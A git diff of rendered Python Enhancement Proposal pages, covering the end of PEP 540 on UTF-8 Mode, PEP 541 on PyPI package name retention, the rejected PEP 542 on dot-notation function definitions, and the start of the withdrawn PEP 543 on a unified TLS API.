This PEP changes the behaviour for the POSIX locale since this locale is +usually equivalent to the ASCII encoding, whereas UTF-8 is a much better +choice. It does not change the behaviour for other locales to prevent +any risk or regression.

+

As users must explicitly enable the new UTF-8 Mode for these other locales, they are responsible for any potential mojibake issues it causes.

+
+
+
+

Proposal

+

Add a new UTF-8 Mode to use the UTF-8 encoding, ignore the locale +encoding, and change stdin and stdout error handlers to +surrogateescape.

+

Add the new -X utf8 command line option and PYTHONUTF8 +environment variable. Users can explicitly activate UTF-8 Mode with the +command-line option -X utf8 or by setting the environment variable +PYTHONUTF8=1.
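
+
For instance, either spelling activates the mode explicitly (a sketch; the capitalization of the reported encoding names may vary between releases):

+
$ python3.7 -X utf8 -c "import sys; print(sys.getfilesystemencoding())"
+utf-8
+
+$ PYTHONUTF8=1 python3.7 -c "import locale; print(locale.getpreferredencoding())"
+UTF-8
+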

+

This mode is disabled by default and enabled by the POSIX locale. Users +can explicitly disable UTF-8 Mode with the command-line option -X +utf8=0 or by setting the environment variable PYTHONUTF8=0.

+

For standard streams, the PYTHONIOENCODING environment variable has +priority over UTF-8 Mode.
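
+
A sketch of that priority in action (the latin-1 codec is chosen arbitrarily):

+
$ PYTHONUTF8=1 PYTHONIOENCODING=latin-1 python3.7 -c "import sys; print(sys.stdout.encoding)"
+latin-1
+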

+

On Windows, the PYTHONLEGACYWINDOWSFSENCODING environment variable (PEP 529) has priority over UTF-8 Mode.

+

Effects of UTF-8 Mode:

+
    +
  • sys.getfilesystemencoding() returns 'UTF-8'.
  • +
  • locale.getpreferredencoding() returns UTF-8; its +do_setlocale argument, and the locale encoding, are ignored.
  • +
  • sys.stdin and sys.stdout error handler is set to +surrogateescape.
  • +
+

Side effects:

+
    +
  • open() uses the UTF-8 encoding by default. However, it still +uses the strict error handler by default.
  • +
  • os.fsdecode() and os.fsencode() use the UTF-8 encoding.
  • +
  • Command line arguments, environment variables and filenames use the +UTF-8 encoding.
  • +
+
+
+

Relationship with the locale coercion (PEP 538)

+

The POSIX locale enables the locale coercion (PEP 538) and the UTF-8 +mode (PEP 540). When the locale coercion is enabled, enabling the +UTF-8 mode has no additional effect.

+

The UTF-8 Mode has the same effect as locale coercion:

+
    +
  • sys.getfilesystemencoding() returns 'UTF-8',
  • +
  • locale.getpreferredencoding() returns UTF-8, and
  • +
  • the sys.stdin and sys.stdout error handlers are set to +surrogateescape.
  • +
+

These changes only affect Python code. But the locale coercion has +additional effects: the LC_CTYPE environment variable and the +LC_CTYPE locale are set to a UTF-8 locale like C.UTF-8. One side +effect is that non-Python code is also impacted by the locale coercion. +The two PEPs are complementary.

+

On platforms like CentOS 7 where locale coercion is not supported, the POSIX locale only enables UTF-8 Mode. In this case, Python code uses the UTF-8 encoding and ignores the locale encoding, whereas non-Python code uses the locale encoding, which is usually ASCII for the POSIX locale.
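
+
The divergence can be observed directly (and mimicked on any platform, since setting LC_ALL also skips locale coercion): the Python level reports UTF-8 while a child process still ends up with the ASCII-based locale encoding. A sketch, with the exact charmap name varying by platform:

+
$ LC_ALL=POSIX python3.7 -c "import sys, subprocess; print(sys.getfilesystemencoding()); subprocess.run(['locale', 'charmap'])"
+utf-8
+ANSI_X3.4-1968
+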

+

While the UTF-8 Mode is supported on all platforms and can be enabled +with any locale, the locale coercion is not supported by all platforms +and is restricted to the POSIX locale.

+

The UTF-8 Mode has only an impact on Python child processes when the +PYTHONUTF8 environment variable is set to 1, whereas the locale +coercion sets the LC_CTYPE environment variables which impacts all +child processes.
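
+
That difference in propagation can be checked via sys.flags.utf8_mode (added in Python 3.7): a child interpreter only inherits the mode when it is requested through the environment variable. A sketch, assuming the child does not itself run in the POSIX locale:

+
$ python3.7 -X utf8 -c "import subprocess, sys; subprocess.run([sys.executable, '-c', 'import sys; print(sys.flags.utf8_mode)'])"
+0
+
+$ PYTHONUTF8=1 python3.7 -c "import subprocess, sys; subprocess.run([sys.executable, '-c', 'import sys; print(sys.flags.utf8_mode)'])"
+1
+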

+

The benefit of the locale coercion approach is that it helps ensure that +encoding handling in binary extension modules and child processes is +consistent with Python’s encoding handling. The upside of the UTF-8 Mode +approach is that it allows an embedding application to change the +interpreter’s behaviour without having to change the process global +locale settings.

+
+
+

Backward Compatibility

+

The only backward incompatible change is that the POSIX locale now +enables the UTF-8 Mode by default: it will now use the UTF-8 encoding, +ignore the locale encoding, and change stdin and stdout error +handlers to surrogateescape.

+
+
+

Annex: Encodings And Error Handlers

+

UTF-8 Mode changes the default encoding and error handler used by +open(), os.fsdecode(), os.fsencode(), sys.stdin, +sys.stdout and sys.stderr.

+
+

Encoding and error handler

+ + + + + + + + + + + + + + + + + + + + + + + + + +
Function                     | Default                 | UTF-8 Mode or POSIX locale
open()                       | locale/strict           | UTF-8/strict
os.fsdecode(), os.fsencode() | locale/surrogateescape  | UTF-8/surrogateescape
sys.stdin, sys.stdout        | locale/strict           | UTF-8/surrogateescape
sys.stderr                   | locale/backslashreplace | UTF-8/backslashreplace
+

By comparison, Python 3.6 uses:

+ + + + + + + + + + + + + + + + + + + + + + + + + +
Function                     | Default                 | POSIX locale
open()                       | locale/strict           | locale/strict
os.fsdecode(), os.fsencode() | locale/surrogateescape  | locale/surrogateescape
sys.stdin, sys.stdout        | locale/strict           | locale/surrogateescape
sys.stderr                   | locale/backslashreplace | locale/backslashreplace
+
+
+

Encoding and error handler on Windows

+

On Windows, the encodings and error handlers are different:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Function                     | Default                | Legacy Windows FS encoding | UTF-8 Mode
open()                       | mbcs/strict            | mbcs/strict                | UTF-8/strict
os.fsdecode(), os.fsencode() | UTF-8/surrogatepass    | mbcs/replace               | UTF-8/surrogatepass
sys.stdin, sys.stdout        | UTF-8/surrogateescape  | UTF-8/surrogateescape      | UTF-8/surrogateescape
sys.stderr                   | UTF-8/backslashreplace | UTF-8/backslashreplace     | UTF-8/backslashreplace
+

By comparison, Python 3.6 uses:

+ + + + + + + + + + + + + + + + + + + + + + + + + +
Function                     | Default                | Legacy Windows FS encoding
open()                       | mbcs/strict            | mbcs/strict
os.fsdecode(), os.fsencode() | UTF-8/surrogatepass    | mbcs/replace
sys.stdin, sys.stdout        | UTF-8/surrogateescape  | UTF-8/surrogateescape
sys.stderr                   | UTF-8/backslashreplace | UTF-8/backslashreplace
+

The “Legacy Windows FS encoding” is enabled by the +PYTHONLEGACYWINDOWSFSENCODING environment variable.

+

If stdin and/or stdout is redirected to a pipe, sys.stdin and/or sys.stdout use the mbcs encoding by default rather than UTF-8. But in UTF-8 Mode, sys.stdin and sys.stdout always use the UTF-8 encoding.

+
+

Note

+

There is no POSIX locale on Windows. The ANSI code page is used as +the locale encoding, and this code page never uses the ASCII +encoding.

+
+
+
+ +
+

Post History

+ +
+
+

Version History

+
    +
  • Version 4: locale.getpreferredencoding() now returns 'UTF-8' +in the UTF-8 Mode.
  • +
  • Version 3: The UTF-8 Mode does not change the open() default error +handler (strict) anymore, and the Strict UTF-8 Mode has been +removed.
  • +
  • Version 2: Rewrite the PEP from scratch to make it much shorter and +easier to understand.
  • +
  • Version 1: First version posted to python-dev.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0540.rst

+

Last modified: 2024-11-18 13:06:26 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0541/index.html b/pep-0541/index.html new file mode 100644 index 00000000000..f0a8bcb9381 --- /dev/null +++ b/pep-0541/index.html @@ -0,0 +1,498 @@ + + + + + + + + PEP 541 – Package Index Name Retention | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 541 – Package Index Name Retention

+
+
Author:
+
Łukasz Langa <lukasz at python.org>
+
BDFL-Delegate:
+
Mark Mangoba <mmangoba at python.org>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Process
+
Topic:
+
Packaging
+
Created:
+
12-Jan-2017
+
Post-History:
+

+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes an extension to the Terms of Use [1] of the Package +Index [2], clarifying expectations of package owners regarding +ownership of a package name on the Package Index, specifically with +regards to conflict resolution.

+

Existing package repositories such as CPAN [3], NPM [4], and +GitHub [5] will be investigated as prior art in this field.

+
+
+

Rationale

+

Given that package names on the Index share a single flat namespace, a unique name is a finite resource. The growing age of the Package Index causes a steady rise in conflicts between the current use of a name and a different suggested use of the same name.

+

This document aims to provide general guidelines for solving the +most typical cases of such conflicts.

+
+
+

Approval Process

+

As the application of this policy has potential legal ramifications for the +Python Software Foundation, the approval process used is more formal than that +used for most PEPs.

+

Rather than accepting the PEP directly, the assigned BDFL-Delegate will instead +recommend its acceptance to the PSF’s Packaging Working Group. After +consultation with the PSF’s General Counsel, adoption of the policy will then +be subject to a formal vote within the working group.

+

This formal approval process will be used for both initial adoption of the +policy, and for adoption of any future amendments.

+
+
+

Specification

+

The main idea behind this document is that the Package Index serves the +community. Every user is invited to upload content to the Package Index +under the Terms of Use, understanding that it is at the sole risk of +the user.

+

While the Package Index is not a backup service, the maintainers of the Package Index do their best to keep that content accessible indefinitely in its published form. However, in certain edge cases the greater community’s needs might outweigh the individual’s expectation of ownership of a package name.

+

The use cases covered by this document are:

+
    +
  • Abandoned projects:
      +
    • continued maintenance by a different set of users; or
    • +
    • removal from the Index for use with a different project.
    • +
    +
  • +
  • Active projects:
      +
    • resolving disputes over a name.
    • +
    +
  • +
  • Invalid projects:
      +
    • projects subject to a claim of intellectual property infringement.
    • +
    +
  • +
+

The proposed extension to the Terms of Use, as expressed in the +Implementation section, will be published as a separate document on the +Package Index, linked next to existing Terms of Use in the front page +footer.

+
+
+

Implementation

+
+

Reachability

+

The user of the Package Index is solely responsible for being reachable +by the Package Index maintainers for matters concerning projects that +the user owns. In every case where contacting the user is necessary, +the maintainers will try to do so at least three times, using the +following means of contact:

+
    +
  • the e-mail address on file in the user’s profile on the Package Index;
  • +
  • the e-mail address listed in the Author field for a given project +uploaded to the Index; and
  • +
  • any e-mail addresses found in the given project’s documentation +on the Index or on the listed Home Page.
  • +
+

The maintainers stop trying to reach the user after six weeks.

+
+
+

Abandoned projects

+

A project is considered abandoned when ALL of the following are met:

+
    +
  • owner not reachable (see Reachability above);
  • +
  • no releases within the past twelve months; and
  • +
  • no activity from the owner on the project’s home page (or no +home page listed).
  • +
+

All other projects are considered active.

+
+
+

Continued maintenance of an abandoned project

+

If a candidate appears willing to continue maintenance on an abandoned +project, ownership of the name is transferred when ALL of the following +are met:

+
    +
  • the project has been determined abandoned by the rules described +above;
  • +
  • the candidate is able to demonstrate their own failed attempts to contact +the existing owner;
  • +
  • the candidate is able to demonstrate improvements made on the +candidate’s own fork of the project;
  • +
  • the candidate is able to demonstrate why a fork under a different name +is not an acceptable workaround; and
  • +
  • the maintainers of the Package Index don’t have any additional +reservations.
  • +
+

Under no circumstances will a name be reassigned against the wishes of +a reachable owner.

+
+
+

Removal of an abandoned project

+

Projects are never removed from the Package Index solely on the basis +of abandonment. Artifacts uploaded to the Package Index hold inherent +historical value.

+

An abandoned project can be transferred to a new owner for purposes +of reusing the name when ALL of the following are met:

+
    +
  • the project has been determined abandoned by the rules described +above;
  • +
  • the candidate is able to demonstrate their own failed attempts to contact +the existing owner;
  • +
  • the candidate is able to demonstrate that the project suggested to +reuse the name already exists and meets notability requirements;
  • +
  • the candidate is able to demonstrate why a fork under a different name +is not an acceptable workaround;
  • +
  • download statistics on the Package Index for the existing package +indicate project is not being used; and
  • +
  • the maintainers of the Package Index don’t have any additional +reservations.
  • +
+
+
+

Name conflict resolution for active projects

+

The maintainers of the Package Index are not arbiters in disputes +around active projects. There are many possible scenarios here, +a non-exclusive list describing some real-world examples is presented +below. None of the following qualify for package name ownership +transfer:

+
    +
  1. User A and User B share project X. After some time they part ways +and each of them wants to continue the project under name X.
  2. +
3. User A owns a project X outside the Package Index. User B creates a package under the name X on the Index. After some time, User A wants to publish project X on the Index but realizes the name is taken. This is true even if User A’s project X gains notability and User B’s project X is not notable.
  4. +
  5. User A publishes project X to the Package Index. After some time +User B proposes bug fixes to the project but no new release is +published by User A. This is true even if User A agrees to publish +a new version and later doesn’t, even if User B’s changes are merged +to the source code repository for project X.
  6. +
+

Again, the list above is not exclusive. The maintainers of the Package +Index recommend users to get in touch with each other and solve the +issue by respectful communication (see the PSF Code of Conduct [6]).

+
+
+

Invalid projects

+

A project published on the Package Index meeting ANY of the following +is considered invalid and will be removed from the Index:

+
    +
  • project does not conform to Terms of Use;
  • +
  • project is malware (designed to exploit or harm systems or users directly, to +facilitate command-and-control attacks, or perform data exfiltration);
  • +
  • project is spam (designed to advertise or solicit goods or services);
  • +
  • project contains illegal content;
  • +
  • project violates copyright, trademarks, patents, or licenses;
  • +
  • project is name squatting (package has no functionality or is +empty);
  • +
  • project name, description, or content violates the Code of Conduct;
  • +
  • project uses obfuscation to hide or mask functionality; +or
  • +
• project is abusing the Package Index for purposes for which it was not intended.
  • +
+

The Package Index maintainers pre-emptively declare certain package +names as unavailable for security reasons.

+
+
+

Intellectual property policy

+

It is the policy of Python Software Foundation and the Package Index +maintainers to be appropriately responsive to claims of intellectual +property infringement by third parties. It is not the policy of +the Python Software Foundation nor the Package Index maintainers +to pre-screen uploaded packages for any type of intellectual property +infringement.

+

Possibly-infringing packages should be reported to legal@python.org +and counsel to the Python Software Foundation will determine an +appropriate response. A package can be removed or transferred to a +new owner at the sole discretion of the Python Software Foundation to +address a claim of infringement.

+

A project published on the Package Index meeting ANY of the following +may be considered infringing and subject to removal from the Index +or transferral to a new owner:

+
    +
  • project contains unlicensed copyrighted material from a third party, +and is subject to a properly made claim under the DMCA;
  • +
  • project uses a third party’s trademark in a way not covered by +nominal or fair use guidelines;
  • +
  • project clearly implicates a patented system or process, and is +the subject of a complaint; or
  • +
  • project is subject to an active lawsuit.
  • +
+

In the event of a complaint for intellectual property infringement, +a copy of the complaint will be sent to the package owner. In some +cases, action may be taken by the Package Index maintainers before +the owner responds.

+
+
+

The role of the Python Software Foundation

+

The Python Software Foundation [7] is the non-profit legal entity that +provides the Package Index as a community service.

+

The Package Index maintainers can escalate issues covered by this +document for resolution by the Packaging Workgroup if the matter is not clear +enough. Some decisions require additional judgement by the Board, +especially in cases of Code of Conduct violations or legal claims. +Recommendations made by the Board are sent to the Packaging Workgroup [8] for review.

+

The Packaging Workgroup has the final say in any disputes covered by this document and +can decide to reassign or remove a project from the Package Index after +careful consideration even when not all requirements listed +here are met.

+
+
+
+

How to request a name transfer

+

If you want to take over an existing project name on PyPI, +these are the steps to follow:

+
    +
  1. Try to contact the current owner(s) directly: email them and open an issue +if you can find a related repository. The processes described here are meant +as a last resort if the owner cannot be contacted.
  2. +
  3. Check the criteria above to see when a transfer is allowed. In particular, +the criteria for reusing a name for a different project +are more stringent than for continuing maintenance of the same project - although it’s not easy to get a name transferred +in either case.
  4. +
  5. Search the PyPI Support issues +to see if anyone else is already requesting the same name.
  6. +
  7. If all the criteria are met to transfer ownership of the name, +open a new issue +to request it, detailing why you believe each relevant criterion is +satisfied.
  8. +
+
+
+

Prior art

+

NPM contains a separate section linked from the front page called +Package Name Disputes. +It is described as a “living document”, as of January 2017 its +contents might be summarized as follows:

+
    +
  • package name squatting is prohibited;
  • +
  • users wanting to reuse a project name are required to contact the +existing author, with cc to support@npmjs.com;
  • +
  • all contact must conform to the NPM Code of Conduct;
  • +
  • in case of no resolution after a few weeks, npm inc. holds the right +to the final decision in the matter.
  • +
+

CPAN lets any user upload modules with the same name. PAUSE, a related +index, only lists modules uploaded by the primary maintainer or listed +co-maintainers. CPAN documentation doesn’t address disputes otherwise.

+

GitHub’s terms of service contain an exhaustive list of behavior +not meeting general conditions of use. While not codified anywhere, +GitHub does agree for users to reclaim abandoned account names by +archiving the abandoned account and letting the other user or +organization rename their account. This is done on a case-by-case +basis.

+
+
+

Rejected Proposals

+

The original approach was to hope for the best and solve issues as they arise without written policy. This is not sustainable. The lack of generally available written guidelines on package name conflict resolution is causing unnecessary tension. From the perspective of users, decisions made by the Package Index maintainers without written guidelines may appear arbitrary. From the perspective of the Package Index maintainers, resolving name conflicts is a stressful task, because without a defined policy there is a risk of causing unintentional harm.

+
+
+

References

+ +
+ +
+

Acknowledgements

+

The many participants of the Distutils and Catalog SIGs for their +ideas over the years.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0541.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0542/index.html b/pep-0542/index.html new file mode 100644 index 00000000000..78966ce9107 --- /dev/null +++ b/pep-0542/index.html @@ -0,0 +1,276 @@ + + + + + + + + PEP 542 – Dot Notation Assignment In Function Header | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 542 – Dot Notation Assignment In Function Header

+
+
Author:
+
Markus Meskanen <markusmeskanen at gmail.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
10-Feb-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Function definitions only allow simple function names to be used, +even though functions are assignable first class objects.

+

This PEP proposes adding support for assigning a function to +a class or instance attribute directly in the function +definition’s header by using the dot notation to separate +the object from the function’s name.

+

Although it would be a similar feature, this PEP does not address general assignment to anything that supports assignment, such as dict keys and list indexes.

+
+
+

Rationale

+

Currently if a function needs to be assigned to a class or instance +attribute, it requires an additional assignment statement to be made:

+
class MyClass:
+    ...
+
+my_instance = MyClass()
+
+def my_function(self):
+    ...
+
+# Assign to class attribute
+MyClass.my_function = my_function
+
+# Or assign to instance attribute
+my_instance.my_function = my_function
+
+
+

While this isn’t usually an inconvenience, using dot notation to +assign directly in the function’s header would greatly simplify this:

+
class MyClass:
+    ...
+
+my_instance = MyClass()
+
+# Assign to class attribute
+def MyClass.my_function(self):
+    ...
+
+# Or assign to instance attribute
+def my_instance.my_function(self):
+    ...
+
+
+

There are multiple reasons to use this functionality over +a standard class method, for example when the class is referenced +inside the function’s header (such as with decorators and typing). +This is also useful when an instance requires a callback attribute:

+
class Menu:
+    def __init__(self, items=None, select_callback=None):
+        self.items = items if items is not None else []
+        self.select_callback = select_callback
+
+my_menu = Menu([item1, item2])
+
+def my_menu.select_callback(item_index, menu):
+    print(menu.items[item_index])
+
+
+

As opposed to:

+
my_menu = Menu([item1, item2])
+
+def select_callback(item_index, menu):
+    print(menu.items[item_index])
+my_menu.select_callback = select_callback
+
+
+

Or defining them in an “unnatural” order:

+
def select_callback(item_index, menu):
+    print(menu.items[item_index])
+
+my_menu = Menu([item1, item2], select_callback)
+
+
+

It reads better than the “unnatural” way, since you already know at the time of the function definition what it’s going to be used for. It also saves one line of code while removing visual complexity.

+

The feature would also avoid leaving the function’s name into +the global namespace:

+
eggs = 'something'
+
+def Spam.eggs(self):
+    ...
+
+def Cheese.eggs(self):
+    ...
+
+assert eggs == 'something'
+
+
+

Ideally this would be just syntactic sugar:

+
def x.y():
+    ...
+
+# Equals to
+
+def y():
+    ...
+x.y = y
+
+
+

Similar to how decorators are syntactic sugar:

+
@decorate
+def f():
+    ...
+
+# Equals to
+
+def f():
+    ...
+f = decorate(f)
+
+
+
+
+

Implementation

+

The __name__ would follow the principles of a normal function:

+
class MyClass:
+    def my_function1(self):
+        ...
+
+def MyClass.my_function2(self):
+    ...
+
+assert MyClass.my_function1.__name__ == 'my_function1'
+assert MyClass.my_function2.__name__ == 'my_function2'
+
+
+

The grammar would use dotted_name to support chaining of attributes:

+
def Person.name.fset(self, value):
+    self._name = value
+
+
+
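Chained attribute assignment of this kind is already expressible on plain objects today, which clarifies what dotted_name would buy; a minimal self-contained sketch, with the hypothetical names api and on_connect:
from types import SimpleNamespace
+
+api = SimpleNamespace(handlers=SimpleNamespace())
+
+def on_connect(event):
+    ...
+
+# Today's spelling of the proposed "def api.handlers.on_connect(event):"
+api.handlers.on_connect = on_connect
+assert api.handlers.on_connect is on_connect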
+
+

Backwards Compatibility

+

This PEP is fully backwards compatible.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0542.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0543/index.html b/pep-0543/index.html new file mode 100644 index 00000000000..c35b9c7afa4 --- /dev/null +++ b/pep-0543/index.html @@ -0,0 +1,1620 @@ + + + + + + + + PEP 543 – A Unified TLS API for Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 543 – A Unified TLS API for Python

+
+
Author:
+
Cory Benfield <cory at lukasa.co.uk>, +Christian Heimes <christian at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
17-Oct-2016
+
Python-Version:
+
3.7
+
Post-History:
+
11-Jan-2017, 19-Jan-2017, 02-Feb-2017, 09-Feb-2017
+
Superseded-By:
+
748
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP would define a standard TLS interface in the form of a collection of +abstract base classes. This interface would allow Python implementations and +third-party libraries to provide bindings to TLS libraries other than OpenSSL +that can be used by tools that expect the interface provided by the Python +standard library, with the goal of reducing the dependence of the Python +ecosystem on OpenSSL.

+
+
+

Resolution

+

2020-06-25: With contemporary agreement with one author, and past +agreement with another, this PEP is withdrawn due to changes in the +APIs of the underlying operating systems.

+
+
+

Rationale

+

In the 21st century it has become increasingly clear that robust and +user-friendly TLS support is an extremely important part of the ecosystem of +any popular programming language. For most of its lifetime, this role in the +Python ecosystem has primarily been served by the ssl module, which provides +a Python API to the OpenSSL library.

+

Because the ssl module is distributed with the Python standard library, it +has become the overwhelmingly most-popular method for handling TLS in Python. +An extraordinary majority of Python libraries, both in the standard library and +on the Python Package Index, rely on the ssl module for their TLS +connectivity.

+

Unfortunately, the preeminence of the ssl module has had a number of +unforeseen side-effects that have had the effect of tying the entire Python +ecosystem tightly to OpenSSL. This has forced Python users to use OpenSSL even +in situations where it may provide a worse user experience than alternative TLS +implementations, which imposes a cognitive burden and makes it hard to provide +“platform-native” experiences.

+
+

Problems

+

The fact that the ssl module is built into the standard library has meant +that all standard-library Python networking libraries are entirely reliant on +the OpenSSL that the Python implementation has been linked against. This +leads to the following issues:

+
    +
  • It is difficult to take advantage of new, higher-security TLS without +recompiling Python to get a new OpenSSL. While there are third-party bindings +to OpenSSL (e.g. pyOpenSSL), these need to be shimmed into a format that +the standard library understands, forcing projects that want to use them to +maintain substantial compatibility layers.
  • +
  • For Windows distributions of Python, they need to be shipped with a copy of +OpenSSL. This puts the CPython development team in the position of being +OpenSSL redistributors, potentially needing to ship security updates to the +Windows Python distributions when OpenSSL vulnerabilities are released.
  • +
  • For macOS distributions of Python, they need either to be shipped with a copy +of OpenSSL or linked against the system OpenSSL library. Apple has formally +deprecated linking against the system OpenSSL library, and even if they had +not, that library version has been unsupported by upstream for nearly one +year as of the time of writing. The CPython development team has started +shipping newer OpenSSLs with the Python available from python.org, but this +has the same problem as with Windows.
  • +
  • Many systems, including but not limited to Windows and macOS, do not make +their system certificate stores available to OpenSSL. This forces users to +either obtain their trust roots from elsewhere (e.g. certifi) or to +attempt to export their system trust stores in some form.

    Relying on certifi is less than ideal, as most system administrators do +not expect to receive security-critical software updates from PyPI. +Additionally, it is not easy to extend the certifi trust bundle to include +custom roots, or to centrally manage trust using the certifi model.

    +

    Even in situations where the system certificate stores are made available to +OpenSSL in some form, the experience is still sub-standard, as OpenSSL will +perform different validation checks than the platform-native TLS +implementation. This can lead to users experiencing different behaviour on +their browsers or other platform-native tools than they experience in Python, +with little or no recourse to resolve the problem.

    +
  • +
  • Users may wish to integrate with TLS libraries other than OpenSSL for many +other reasons, such as OpenSSL missing features (e.g. TLS 1.3 support), or +because OpenSSL is simply too large and unwieldy for the platform (e.g. for +embedded Python). Those users are left with the requirement to use +third-party networking libraries that can interact with their preferred TLS +library or to shim their preferred library into the OpenSSL-specific ssl +module API.
  • +
+

Additionally, the ssl module as implemented today limits the ability of +CPython itself to add support for alternative TLS backends, or remove OpenSSL +support entirely, should either of these become necessary or useful. The +ssl module exposes too many OpenSSL-specific function calls and features to +easily map to an alternative TLS backend.

+
+
+
+

Proposal

+

This PEP proposes to introduce a few new Abstract Base Classes in Python 3.7 to +provide TLS functionality that is not so strongly tied to OpenSSL. It also +proposes to update standard library modules to use only the interface exposed +by these abstract base classes wherever possible. There are three goals here:

+
    +
  1. To provide a common API surface for both core and third-party developers to +target their TLS implementations to. This allows TLS developers to provide +interfaces that can be used by most Python code, and allows network +developers to have an interface that they can target that will work with a +wide range of TLS implementations.
  2. +
3. To provide an API that lets few or no OpenSSL-specific concepts leak through. +The ssl module today has a number of warts caused by leaking OpenSSL +concepts through to the API: the new ABCs would remove those specific +concepts.
  4. +
  5. To provide a path for the core development team to make OpenSSL one of many +possible TLS backends, rather than requiring that it be present on a system +in order for Python to have TLS support.
  6. +
+

The proposed interface is laid out below.

+
+

Interfaces

+

There are several interfaces that require standardisation. Those interfaces +are:

+
    +
  1. Configuring TLS, currently implemented by the SSLContext class in the +ssl module.
  2. +
  3. Providing an in-memory buffer for doing in-memory encryption or decryption +with no actual I/O (necessary for asynchronous I/O models), currently +implemented by the SSLObject class in the ssl module.
  4. +
  5. Wrapping a socket object, currently implemented by the SSLSocket class +in the ssl module.
  6. +
  7. Applying TLS configuration to the wrapping objects in (2) and (3). Currently +this is also implemented by the SSLContext class in the ssl module.
  8. +
  9. Specifying TLS cipher suites. There is currently no code for doing this in +the standard library: instead, the standard library uses OpenSSL cipher +suite strings.
  10. +
  11. Specifying application-layer protocols that can be negotiated during the +TLS handshake.
  12. +
  13. Specifying TLS versions.
  14. +
  15. Reporting errors to the caller, currently implemented by the SSLError +class in the ssl module.
  16. +
  17. Specifying certificates to load, either as client or server certificates.
  18. +
  19. Specifying which trust database should be used to validate certificates +presented by a remote peer.
  20. +
  21. Finding a way to get hold of these interfaces at run time.
  22. +
+

For the sake of simplicity, this PEP proposes to take a unified approach to +(2) and (3) (that is, buffers and sockets). The Python socket API is a +sizeable one, and implementing a wrapped socket that has the same behaviour as +a regular Python socket is a subtle and tricky thing to do. However, it is +entirely possible to implement a generic wrapped socket in terms of wrapped +buffers: that is, it is possible to write a wrapped socket (3) that will work +for any implementation that provides (2). For this reason, this PEP proposes to +provide an ABC for wrapped buffers (2) but a concrete class for wrapped sockets +(3).

+

This decision has the effect of making it impossible to bind a small number of +TLS libraries to this ABC, because those TLS libraries cannot provide a +wrapped buffer implementation. The most notable of these at this time appears +to be Amazon’s s2n, which currently does not provide an I/O abstraction +layer. However, even s2n’s developers consider this a missing feature and are +working to add it. For this reason, it is safe to assume that a concrete +implementation of (3) in terms of (2) will be a substantial effort-saving +device and a great tool for correctness. Therefore, this PEP proposes doing +just that.

+

Obviously, (5) doesn’t require an abstract base class: instead, it requires a +richer API for configuring supported cipher suites that can be easily updated +with supported cipher suites for different implementations.

+

(9) is a thorny problem, because in an ideal world the private keys associated +with these certificates would never end up in-memory in the Python process +(that is, the TLS library would collaborate with a Hardware Security Module +(HSM) to provide the private key in such a way that it cannot be extracted from +process memory). Thus, we need to provide an extensible model of providing +certificates that allows concrete implementations the ability to provide this +higher level of security, while also allowing a lower bar for those +implementations that cannot. This lower bar would be the same as the status +quo: that is, the certificate may be loaded from an in-memory buffer or from a +file on disk.

+

(10) also represents an issue because different TLS implementations vary wildly +in how they allow users to select trust stores. Some implementations have +specific trust store formats that only they can use (such as the OpenSSL CA +directory format that is created by c_rehash), and others may not allow you +to specify a trust store that does not include their default trust store.

+

For this reason, we need to provide a model that assumes very little about the +form that trust stores take. The “Trust Store” section below goes into more +detail about how this is achieved.

+

Finally, this API will split the responsibilities currently assumed by the +SSLContext object: specifically, the responsibility for holding and managing +configuration and the responsibility for using that configuration to build +wrapper objects.

+

This is necessary primarily for supporting functionality like Server Name +Indication (SNI). In OpenSSL (and thus in the ssl module), the server has +the ability to modify the TLS configuration in response to the client telling +the server what hostname it is trying to reach. This is mostly used to change +the certificate chain so as to present the correct TLS certificate chain for the +given hostname. The specific mechanism by which this is done is by returning +a new SSLContext object with the appropriate configuration.

+

This is not a model that maps well to other TLS implementations. Instead, we +need to make it possible to provide a return value from the SNI callback that +can be used to indicate what configuration changes should be made. This means +providing an object that can hold TLS configuration. This object needs to be +applied to specific TLSWrappedBuffer and TLSWrappedSocket objects.

+

For this reason, we split the responsibility of SSLContext into two separate +objects. The TLSConfiguration object is an object that acts as container +for TLS configuration: the ClientContext and ServerContext objects are +objects that are instantiated with a TLSConfiguration object. All three +objects would be immutable.

+
+

Note

+

The following API declarations uniformly use type hints to aid +reading. Some of these type hints cannot actually be used in practice +because they are circularly referential. Consider them more a +guideline than a reflection of the final code in the module.

+
+
+

Configuration

+

The TLSConfiguration concrete class defines an object that can hold and +manage TLS configuration. The goals of this class are as follows:

+
    +
  1. To provide a method of specifying TLS configuration that avoids the risk of +errors in typing (this excludes the use of a simple dictionary).
  2. +
  3. To provide an object that can be safely compared to other configuration +objects to detect changes in TLS configuration, for use with the SNI +callback.
  4. +
+

This class is not an ABC, primarily because it is not expected to have +implementation-specific behaviour. The responsibility for transforming a +TLSConfiguration object into a useful set of configuration for a given TLS +implementation belongs to the Context objects discussed below.

+

